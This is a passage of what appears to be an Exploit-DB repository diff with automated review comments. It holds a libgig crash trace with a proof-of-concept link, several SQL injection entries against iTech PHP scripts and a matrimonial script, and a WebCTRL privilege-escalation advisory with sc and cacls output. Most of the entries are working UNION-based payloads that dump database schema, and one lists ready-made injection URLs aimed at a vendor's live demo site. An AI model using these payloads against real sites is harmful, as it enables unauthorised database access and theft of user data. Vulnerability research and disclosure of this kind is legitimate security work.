#4 0x7fea916456a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#5 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#6 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#7 0x7fea90c93ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:3849 gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)
==44028== ABORTING
POC:
libgig_4.0.0_invalid_memory_read.gig
CVE:
CVE-2017-12954
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42546.zip
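
Review bot: Item 4 (CVE-2017-12953) describes the bug only as an "invalid memory write", although the pasted gdb output already shows the cause, and the description should state it. The loop at +8..+30 clears 0x400 bytes starting at 0x80(%rdi), which is 128 pointer slots of RegionKeyTable, while at the faulting store `mov %rcx,0x80(%rdi,%rdx,8)` the index register rdx holds 0x3fbc. The two 16-bit range bounds loaded with movzwl from 0x78(%rcx) and 0x7a(%rcx) are therefore used as a table index without a bounds check, and saying so lets a maintainer verify the fix against this record. The `i r` dumps in items 4 and 5 have also lost their column spacing (hex and decimal run together, e.g. `rax 0x3fbd16317`) and still contain the gdb pager prompts, and item 5 repeats "in gig.cpp in gig.cpp".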

36
platforms/php/webapps/42505.txt Executable file

@ -0,0 +1,36 @@
# # # # #
# Exploit Title: Itech B2B Script 4.42 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/c/B2B/
# Demo: http://b2b.itechscripts.com/
# Version: 4.42
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE:
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
# http://localhost/[PATH]/catcompany.php?token=[SQL]
# -1048a1d0c6e83f027327d8461063f4ac58a6'+/*!22222union*/+/*!22222select*/+0x31,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x33,0x34,0x35,0x36--+-
#
# http://localhost/[PATH]/search.php?keywords=[SQL]
#
# http://localhost/[PATH]/search.php?rctyp=[SQL]
#
# http://localhost/[PATH]/buyleads-details.php?id=[SQL]
#
# http://localhost/[PATH]/category.php?token=[SQL]
#
# http://localhost/[PATH]/company/index.php?c=[SQL]
#
# Reference:
#
# # # # #
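
Review bot: The header leaves `# CVE:` and `# Reference:` empty, while the other entries in this commit write `N/A`; fill both fields or mark them `N/A` so the records stay consistent. The description "inject sql commands...." also does not say whether the listed endpoints need an authenticated session, which is what a defender needs to rate exposure.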

27
platforms/php/webapps/42506.txt Executable file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: iTech Business Networking Script 8.26 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage: http://itechscripts.com/
# Software Link: http://itechscripts.com/business-networking-script/
# Demo: http://professional-network.itechscripts.com/
# Version: 8.26
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/group.php?grid=[SQL]
# -1'+/*!22222union*/+/*!22222select*/+0x31,0x32,0x33,0x34,0x35,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134--+-
#
# http://localhost/[PATH]/join_group.php?id=[SQL]
#
# # # # #

67
platforms/php/webapps/42507.txt Executable file

@ -0,0 +1,67 @@
# # # # #
# Exploit Title: iTech Caregiver Script 2.71 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/caregiver-script/
# Demo: http://caregiver.itechscripts.com/
# Version: 2.71
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/searchSitter.php?myCity=[SQL]
# -1'+/*!22222union*/+/*!22222select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+-
#
# http://localhost/[PATH]/searchSitter.php?sitterService=[SQL]
#
# http://localhost/[PATH]/searchSitter.php?age=[SQL]
#
# http://localhost/[PATH]/searchSitter.php?gender=[SQL]
#
# http://localhost/[PATH]/searchSitter.php?lastLoginElapsedInDays=[SQL]
#
# http://localhost/[PATH]/searchSitter.php?yearsOfExperience=[SQL]
#
# http://localhost/[PATH]/searchSitter.php?collegeLevel=[SQL]
#
# http://localhost/[PATH]/searchSitter.php?fullPartTime=[SQL]
#
# http://localhost/[PATH]/searchSitter.php?liveInOut=[SQL]
#
# http://localhost/[PATH]/searchJob.php?sitterService=[SQL]
#
# http://localhost/[PATH]/searchJob.php?jobType=[SQL]
#
# http://localhost/[PATH]/searchJob.php?jobFrequency=[SQL]
#
# Etc...
# # # # #
http://caregiver.itechscripts.com/searchSitter.php?myCity=-1'+/*!22222union*/+/*!22222select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+-
http://caregiver.itechscripts.com/searchSitter.php?sitterService=1'
http://caregiver.itechscripts.com/searchSitter.php?myCity=1'
http://caregiver.itechscripts.com/searchSitter.php?age=1'
http://caregiver.itechscripts.com/searchSitter.php?gender=1'
http://caregiver.itechscripts.com/searchSitter.php?lastLoginElapsedInDays=1'
http://caregiver.itechscripts.com/searchSitter.php?yearsOfExperience=1'
http://caregiver.itechscripts.com/searchSitter.php?collegeLevel=1'
http://caregiver.itechscripts.com/searchSitter.php?fullPartTime=1'
http://caregiver.itechscripts.com/searchSitter.php?liveInOut=1'
http://caregiver.itechscripts.com/searchJob.php?sitterService=2'
http://caregiver.itechscripts.com/searchJob.php?jobType=2'
http://caregiver.itechscripts.com/searchJob.php?jobFrequency=2'
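
Review bot: The lines after the closing `# # # # #` banner are uncommented request URLs against the vendor's hosted demo at caregiver.itechscripts.com, whereas the commented list above them uses the `http://localhost/[PATH]/` placeholder. They repeat the parameter list already given, so drop them or rewrite them in the placeholder form, so that the entry does not embed requests to a third party's live host.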

30
platforms/php/webapps/42508.txt Executable file

@ -0,0 +1,30 @@
# # # # #
# Exploit Title: iTech Classifieds Script 7.41 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/classifieds-script/
# Demo: http://classifieds.itechscripts.com/
# Version: 7.41
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/message.php?pid=[SQL]
# -13++UNION+ALL+SELECT+0x31,0x32,0x33,0x34,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332,0x3333,0x3334,0x3335,0x3336,0x3337,0x3338,0x3339,0x3430,0x3431,0x3432,0x3433,0x3434,0x3435,0x3436,0x3437,0x3438,0x3439,0x3530,0x3531,0x3532--+-
#
# http://localhost/[PATH]/userlistings.php?id=[SQL]
#
# http://localhost/[PATH]/show_like.php?cid=[SQL]
#
# Etc...
# # # # #
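
Review bot: The parameter list ends in `# Etc...`, so the entry does not say what is actually affected; only `message.php?pid`, `userlistings.php?id` and `show_like.php?cid` are named. Either list every affected script and parameter or state that the three named ones are examples, so that a vendor fix can be checked against the record.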

32
platforms/php/webapps/42509.txt Executable file

@ -0,0 +1,32 @@
# # # # #
# Exploit Title: iTech Image Sharing Script 4.13 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/image-sharing-script/
# Demo: http://photo-sharing.itechscripts.com/
# Version: 4.13
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/pinDetails.php?token=[SQL]
# -7136c4ca4238a0b923820dcc509a6f75849b'+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x2832302)--+-
#
# http://localhost/[PATH]/boardpage.php?token=[SQL]
#
# http://localhost/[PATH]/searchpin.php?q=[SQL]
#
# http://localhost/[PATH]/profilepage.php?token=[SQL]
#
# Etc...
# # # # #

29
platforms/php/webapps/42510.txt Executable file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: iTech Freelancer Script 5.27 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/freelancer-script/
# Demo: http://freelance.itechscripts.com/
# Version: 5.27
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/profile.php?u=[SQL]
# -c4ca4238a0b923820dcc509a6f75849b'+UNION(SELECT+0x283129,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529)--+-
#
# http://localhost/[PATH]/showSkill.php?cat=[SQL]
# -1+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429)--+-
#
# Etc...
# # # # #

28
platforms/php/webapps/42511.txt Executable file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: iTech Travel Script 9.49 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/travel-portal-script/
# Demo: http://travelportal.itechscripts.com/
# Version: 9.49
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/hotel_view.php?id=[SQL]
# -9+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029)--+-
#
# http://localhost/[PATH]/bus_details.php?id=[SQL]
#
# Etc...
# # # # #

28
platforms/php/webapps/42513.txt Executable file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: iTech Multi Vendor Script 6.63 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/multi-vendor-shopping-script/
# Demo: http://multi-vendor.itechscripts.com/
# Version: 6.63
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/search.php?category_id=[SQL]
# -9+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529)--+-
#
# http://localhost/[PATH]/product.php?id=[SQL]
#
# Etc...
# # # # #

44
platforms/php/webapps/42545.txt Executable file

@ -0,0 +1,44 @@
# # # # #
# Exploit Title: Matrimonial Script - SQL Injection
# Dork: N/A
# Date: 22.08.2017
# Vendor Homepage: http://www.scubez.net/
# Software Link: http://www.mscript.in/
# Demo: http://www.mscript.in/matrimonial-demo.html
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/viewprofile.php?id=[SQL]
#
# -MUS00053'+/*!11100uNiOn*/(/*!11100sElEct*/0x283129,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729,0x28343829,0x28343929,0x28353029,0x28353129,0x28353229,0x28353329,0x28353429,0x28353529,0x28353629,0x28353729,0x28353829,0x28353929,0x28363029,0x28363129,0x28363229,0x28363329,0x28363429,0x28363529,0x28363629,0x28363729,0x28363829,0x28363929,0x28373029,0x28373129,0x28373229,0x28373329,0x28373429,0x28373529,0x28373629,0x28373729,0x28373829,0x28373929,0x28383029,0x28383129,0x28383229,0x28383329,0x28383429,0x28383529,0x28383629,0x28383729,0x28383829,0x28383929,0x28393029,0x28393129,0x28393229,0x28393329,0x28393429,0x28393529,0x28393629,0x28393729,0x28393829,0x28393929,0x2831303029,0x2831303129,0x2831303229,0x2831303329,0x2831303429,0x2831303529,0x2831303629,0x2831303729,0x2831303829,0x2831303929,0x2831313029,0x2831313129,0x2831313229,0x2831313329,0x2831313429,0x2831313529,0x2831313629,0x2831313729,0x2831313829,0x2831313929,0x2831323029,0x2831323129,0x2831323229,0x2831323329,0x2831323429,0x2831323529,0x2831323629,0x2831323729,0x2831323829,0x2831323929,0x2831333029,0x2831333129,0x2831333229,0x2831333329,0x2831333429,0x2831333529,0x2831333629,0x2831333729,0x2831333829,0x2831333929,0x2831343029,0x2831343129,0x2831343229,0x2831343329,0x2831343429,0x2831343529,0x2831343629,0x2831343729,0x2831343829,0x2831343929,0x2831353029,0x2831353129,0x2831353229,0x2831353329,0x2831353429,0x2831353529,0x2831353629,0x2831353729,0x2831353829,0x2831353929,0x2831363029,0x2831363129,0x2831363229,0x2831363329,0x2831363429,0x2
831363529,0x2831363629,0x2831363729,0x2831363829,0x2831363929,0x2831373029,0x2831373129,0x2831373229,0x2831373329,0x2831373429,0x2831373529,0x2831373629,0x2831373729,0x2831373829,0x2831373929,0x2831383029,0x2831383129,/*!50000dataBase*/(),0x2831383329)--+-
#
# http://localhost/[PATH]/load_caste_state_city.php?list_type=caste&&parent_id=[SQL]
#
# -1+/*!22255union*/+/*!22255+sElEct*/+0x31,(/*!22255+sElEct*/+eXpoRt_Set(5,@:=0,(/*!22255+sElEct*/+count(*)fROm(iNformatiOn_sChemA.colUmns)/*!22255where*/@:=eXpoRt_Set(5,eXpoRt_Set(5,@,table_name,0x3c6c693e,2),cOlumN_naMe,0xa3a,2)),@,2)),0x33--+-
#
# http://localhost/[PATH]/printprofile.php?id=[SQL]
# http://localhost/[PATH]/viewphoto.php?id=[SQL]
# http://localhost/[PATH]/advsearch_results.php?gender=[SQL]
# http://localhost/[PATH]/advsearch_results.php?age1=[SQL]
# http://localhost/[PATH]/advsearch_results.php?age2=[SQL]
# http://localhost/[PATH]/advsearch_results.php?religion=[SQL]
# http://localhost/[PATH]/advsearch_results.php?caste=[SQL]
# http://localhost/[PATH]/advsearch_results.php?ms=[SQL]
# http://localhost/[PATH]/advsearch_results.php?language=[SQL]
# http://localhost/[PATH]/advsearch_results.php?edu=[SQL]
# http://localhost/[PATH]/advsearch_results.php?occu=[SQL]
# http://localhost/[PATH]/advsearch_results.php?country=[SQL]
#
# Etc..
# # # # #
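
Review bot: `# Version: N/A` in the header, with the product named only as "Matrimonial Script", leaves the affected release unidentified; record the version or the download date that was tested so the entry can be matched to a deployment. The `viewprofile.php` sample is also split in the middle of a literal across two lines, and the second line lacks the leading `# `, so the file no longer reads as a single commented block.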


@ -0,0 +1,84 @@
Automated Logic WebCTRL 6.5 Insecure File Permissions Privilege Escalation
Vendor: Automated Logic Corporation
Product web page: http://www.automatedlogic.com
Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
ALC WebCTRL, SiteScan Web 6.1 and prior
ALC WebCTRL, i-Vu 6.0 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
Summary: WebCTRL®, Automated Logic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators to optimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need to keep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.
Desc: WebCTRL server/service suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the executable
file with a binary of choice. The vulnerability exist due to the improper permissions,
with the 'M' flag (Modify) or 'C' flag (Change) for 'Authenticated Users' group.
The application suffers from an unquoted search path issue as well impacting the service
'WebCTRL Service' for Windows deployed as part of WebCTRL server solution. This could
potentially allow an authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. A successful attempt would require the
local user to be able to insert their code in the system root path undetected by the
OS or other security applications where it could potentially be executed during
application startup or reboot. If successful, the local users code would execute
with the elevated privileges of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5429
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5429.php
CVE ID: CVE-2017-9644
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9644
30.01.2017
---
sc qc "WebCTRL Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Webctrl Service
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WebCTRL6.0\WebCTRL Service.exe -run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WebCTRL Service 6.0
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
cacls "C:\WebCTRL6.0\WebCTRL Service.exe"
C:\WebCTRL6.0\WebCTRL Service.exe
BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
cacls "C:\WebCTRL6.0\WebCTRL Server.exe"
C:\WebCTRL6.0\WebCTRL Server.exe
BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C